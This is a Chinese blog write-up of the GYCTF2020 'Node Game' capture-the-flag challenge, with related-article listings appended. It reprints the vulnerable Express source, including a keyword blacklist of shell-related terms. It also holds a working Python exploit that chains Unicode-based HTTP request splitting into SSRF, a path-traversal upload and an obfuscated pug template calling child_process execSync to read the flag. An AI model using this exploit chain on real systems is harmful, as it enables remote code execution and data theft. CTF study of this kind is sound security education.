[GYCTF2020]Node Game

最新推荐文章于 2024-08-31 10:10:29 发布
最新推荐文章于 2024-08-31 10:10:29 发布
阅读量747 收藏
点赞数 1
分类专栏: 代码审计 nodejs 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/117391355
版权

一道nodejs题,可以直接拿到源码

var express = require('express');
var app = express();
var fs = require('fs');
var path = require('path');
var http = require('http');
var pug = require('pug');
var morgan = require('morgan');
const multer = require('multer');


app.use(multer({dest: './dist'}).array('file'));
app.use(morgan('short'));
app.use("/uploads",express.static(path.join(__dirname, '/uploads')))
app.use("/template",express.static(path.join(__dirname, '/template')))


app.get('/', function(req, res) {
    var action = req.query.action?req.query.action:"index";
    if( action.includes("/") || action.includes("\\") ){
        res.send("Errrrr, You have been Blocked");
    }
    file = path.join(__dirname + '/template/'+ action +'.pug');
    var html = pug.renderFile(file);
    res.send(html);
});

app.post('/file_upload', function(req, res){
    var ip = req.connection.remoteAddress;
    var obj = {
        msg: '',
    }
    if (!ip.includes('127.0.0.1')) {
        obj.msg="only admin's ip can use it"
        res.send(JSON.stringify(obj));
        return 
    }
    fs.readFile(req.files[0].path, function(err, data){
        if(err){
            obj.msg = 'upload failed';
            res.send(JSON.stringify(obj));
        }else{
            var file_path = '/uploads/' + req.files[0].mimetype +"/";
            var file_name = req.files[0].originalname
            var dir_file = __dirname + file_path + file_name
            if(!fs.existsSync(__dirname + file_path)){
                try {
                    fs.mkdirSync(__dirname + file_path)
                } catch (error) {
                    obj.msg = "file type error";
                    res.send(JSON.stringify(obj));
                    return
                }
            }
            try {
                fs.writeFileSync(dir_file,data)
                obj = {
                    msg: 'upload success',
                    filename: file_path + file_name
                } 
            } catch (error) {
                obj.msg = 'upload failed';
            }
            res.send(JSON.stringify(obj));    
        }
    })
})

app.get('/source', function(req, res) {
    res.sendFile(path.join(__dirname + '/template/source.txt'));
});


app.get('/core', function(req, res) {
    var q = req.query.q;
    var resp = "";
    if (q) {
        var url = 'http://localhost:8081/source?' + q
        console.log(url)
        var trigger = blacklist(url);
        if (trigger === true) {
            res.send("");
        } else {
            try {
                http.get(url, function(resp) {
                    resp.setEncoding('utf8');
                    resp.on('error', function(err) {
                    if (err.code === "ECONNRESET") {
                     console.log("Timeout occurs");
                     return;
                    }
                   });

                    resp.on('data', function(chunk) {
                        try {
                         resps = chunk.toString();
                         res.send(resps);
                        }catch (e) {
                           res.send(e.message);
                        }
 
                    }).on('error', (e) => {
                         res.send(e.message);});
                });
            } catch (error) {
                console.log(error);
            }
        }
    } else {
        res.send("search param 'q' missing!");
    }
})

function blacklist(url) {
    var evilwords = ["global", "process","mainModule","require","root","child_process","exec","\"","'","!"];
    var arrayLen = evilwords.length;
    for (var i = 0; i < arrayLen; i++) {
        const trigger = url.includes(evilwords[i]);
        if (trigger === true) {
            return true
        }
    }
}

var server = app.listen(8081, function() {
    var host = server.address().address
    var port = server.address().port
    console.log("Example app listening at http://%s:%s", host, port)
})

简单的审计了一下,猜测利用点在这。
在这里插入图片描述
这里的action参数是我们可控的,结合文件上传界面,猜测是要想办法实现目录穿越,传文件到/template目录下之后利用pug.renderFile函数拿到flag。
在上传界面看到ip必须得是127.0.0.1才能进行上传。
在这里插入图片描述
看到这里,文件名和mimetype进行了拼接,所以目录穿越可以利用mimitype。
但是不知道怎么进行ssrf,看了这篇文章:
通过拆分攻击实现的SSRF攻击
网上抄的大佬的exp:

import requests

payload = """ HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive

POST /file_upload HTTP/1.1
Host: 127.0.0.1
Content-Length: {}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysAs7bV3fMHq0JXUt

{}""".replace('\n', '\r\n')

body = """------WebKitFormBoundarysAs7bV3fMHq0JXUt
Content-Disposition: form-data; name="file"; filename="lethe.pug"
Content-Type: ../template

-var x = eval("glob"+"al.proce"+"ss.mainMo"+"dule.re"+"quire('child_'+'pro'+'cess')['ex'+'ecSync']('cat /flag.txt').toString()")
-return x
------WebKitFormBoundarysAs7bV3fMHq0JXUt--

""".replace('\n', '\r\n')

payload = payload.format(len(body), body) \
    .replace('+', '\u012b')             \
    .replace(' ', '\u0120')             \
    .replace('\r\n', '\u010d\u010a')    \
    .replace('"', '\u0122')             \
    .replace("'", '\u0a27')             \
    .replace('[', '\u015b')             \
    .replace(']', '\u015d') \
    + 'GET' + '\u0120' + '/'

requests.get(
    'http://5750e068-33b5-4a65-a6bf-82412fdee97e.node3.buuoj.cn/core?q=' + payload)

print(requests.get(
    'http://5750e068-33b5-4a65-a6bf-82412fdee97e.node3.buuoj.cn/?action=lethe').text)

在这里插入图片描述
emmm,直接一直不会nodejs,学了一段时间,现在看得懂代码了找得到利用点了还是做不出题,太菜了。

fmyyy1
关注
专栏目录
[GYCTF2020]Blacklist 1(详细做题过程)
lunan的博客
05-24 2731
[GYCTF2020]Blacklist 1(详细做题过程) 文章目录[GYCTF2020]Blacklist 1(详细做题过程)1、考点2、解题过程1、寻找`注入点`2、尝试`堆叠注入`3、尝试`联合注入`4、尝试`双写绕过`5、尝试`大小写绕过`6、传统方法行不通,看别人的wp中提到了`Handler`3、Handler语法 1、考点 1、堆叠注入 2、 Handler语法 心得:学会新的姿势Handler的sql查询方法 2、解题过程 1、寻找注入点 http://3c6e5317-cd37-4
BUUCTF gyctf_2020_borrowstack
BengDouLove的博客
04-22 843
第一个read的只能溢出0x10字节,也就是刚好覆盖返回地址,如果要ROP地方肯定不够 所以栈迁移到bank,在那里ROP 之前没遇到过这样的题,怎么迁过去我苦思冥想,最终还是看了wp,,用两个leave来控制rsp和rbp寄存器,太妙了 leave是个伪代码,,分解开就是 mov rsp,rbp pop rbp 如果把栈构造成这样 ‘A’ * 0x60 bank_addr leave_...
nodegame-server:浏览器和node.js的nodeGame服务器
04-08
节点游戏服务器 nodegame服务器是服务器 。 处理多个连接,创建需求,等候室和游戏室。 资源 执照
nodeGame 开源项目教程
最新发布
gitblog_01027的博客
08-31 812
nodeGame 开源项目教程 nodegameComplete nodegame repository with examples and documentation项目地址:https://gitcode.com/gh_mirrors/no/nodegame 1. 项目的目录结构及介绍 nodeGame 项目的目录结构如下: nodegame/ ├── conf/ │ ├── game/...
从 [GYCTF2020]Node Game 了解 nodejs HTTP拆分攻击
ShenZ的博客
08-29 1042
nodejs HTTP拆分攻击 nodejs 8.12 Node.js API 文档 当 Node.js 使用 http.get 向特定路径发出HTTP 请求时,发出的请求实际上被定向到了不一样的路径,这是因为NodeJS 中 Unicode 字符损坏导致的 HTTP 拆分攻击 原理 Unicode原理 对于不包含主体的请求,Node.js默认使用“latin1”,这是一种单字节编码字符集,不能表示高编号的Unicode字符,例如????这个表情。所以,当我们的请求路径中含有多字节编码的Unico
[GYCTF2020]Node Game-nodejs通过拆分攻击实现的SSRF攻击
cjdgg的博客
08-16 1675
[GYCTF2020]Node Game 漏洞:通过拆分请求实现的SSRF攻击 假设一个服务器,接受用户输入,并将其包含在通过HTTP公开的内部服务请求中,像这样: GET /private-api?q=<user-input-here> HTTP/1.1 Authorization: server-secret-key 如果服务器未正确验证用户输入,则攻击者可能会直接注入协议控制字符到请求里。假设在这种情况下服务器接受了以下用户输入: "x HTTP/1.1\r\n\r\nDELETE /p
BUUCTF:[GYCTF2020]Ezsqli --过滤了information_schem ------ 无列明注入之过滤了union 使用ascii偏移来做
Zero_Adam的博客
03-15 1521
一、自己做: 直截了当的sql注入,先用fuzz字典跑一下: information_schema.table等被过滤了, 而且union 也被过了, 尝试了 || 和&& 等没有过滤,并且strsub,limit等都没有过滤,初步判断盲注应该时可以的。 但是 information_chema等被过滤了,表和 列都查不出来, 二、学到的&&不足: 当information_schema等被过滤的时候,能够查出数据库的名字,但是表明不知道,这时可以用这个来sys.schem
【pwn】 gyctf_2020_borrowstack
Nothing
03-02 1662
例行检查 程序逻辑 看到buf缓冲区有0x10大小溢出,且可以控制bss段上的bank,可以用栈迁移做,这题的bss段离got表较近,在迁移时尽量往高地址迁移,防止在rop时破坏got表上数据。 from pwn import * io=remote('node3.buuoj.cn','29302') bank=0x0601080 leave=0x400699 puts_plt=0x0400...
BUUCTF-PWN gyctf_2020_force(house of force)
weixin_44145820的博客
04-15 1429
目录程序分析漏洞分析漏洞利用EXP 程序分析 程序只有添加功能,puts功能没有用 添加功能中,有三个注意点 chunk大小没有限制 可以获得分配空间的地址 读入长度固定为0x50 漏洞分析 根据题目force,可以联想到house of force堆利用方法 以下内容取自ctf-wiki House Of Force 是一种堆利用方法,但是并不是说 House Of Force 必须...
CTFSHOW game-gyctf web2
这周末在做梦的博客
07-22 1066
反序列化增逃逸
BUUCTF WEB Node Game
qq_41696858的博客
05-18 421
之前没学过node代码,这题上来给了源码,先简单过一遍源码 //调用若干系统模块 //express用于构建web app应用 var express = require('express'); var app = express(); //filesystem var fs = require('fs'); //用于处理文件/目录路径的一个内置模块 var path = require('path'); //用于创建一个web服务器实例 var http = require('http'); //模板引擎
GYCTF2020_Writeup
Lethe's Blog
03-15 2669
Blacklist 一到注入题,和2019强网杯的随便住基本一致,但是多过滤了set、prepare、alter、rename: return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); 获取表名和列名的方式与原题一致,而获取数据可以参考这篇文章:http...
Week小结
qq_61209261的博客
07-15 360
Web安全学习
node漏洞 【持续更新】
weixin_51458899的博客
02-24 1737
node漏洞 持续更新
一道题学习node.js中的CRLF注入
m0_62422842的博客
11-11 1848
这几天刷题遇到在node.js题目中注入CRLF实现ssrf的题目,对于我来说知识听新颖。在此记录一下。
ctf-show WEB板块(持续更新),2024年最新秀出天际
2301_82242296的博客
04-15 1011
需要自己传上去的文件与已存在的key.dat MD5要一致,sha512不一致,那么我们的思路是,首先获得key.dat,首先访问一下这个文件直接下载了,那么第一层的绕过我们直接就使用了key.dat文件,第二层的sha1值我们随便上传一个字符串即可,我们需要并发编程,将$receiveFile中的内容在极短时间内进行替换,这里我们可以编写一个python脚本来进行解题。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;薪资区间6k-15k。
VScode中无法识别Node.js的解决方法
Node.js 在 VSCode 中无法运行的解决方法 **知识点 1:** Node.js 是什么? Node.js 是一个基于 Chrome V8 JavaScript 引擎的 JavaScript 运行环境,可以在服务器端运行 JavaScript 代码。Node.js 提供了一个事件...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值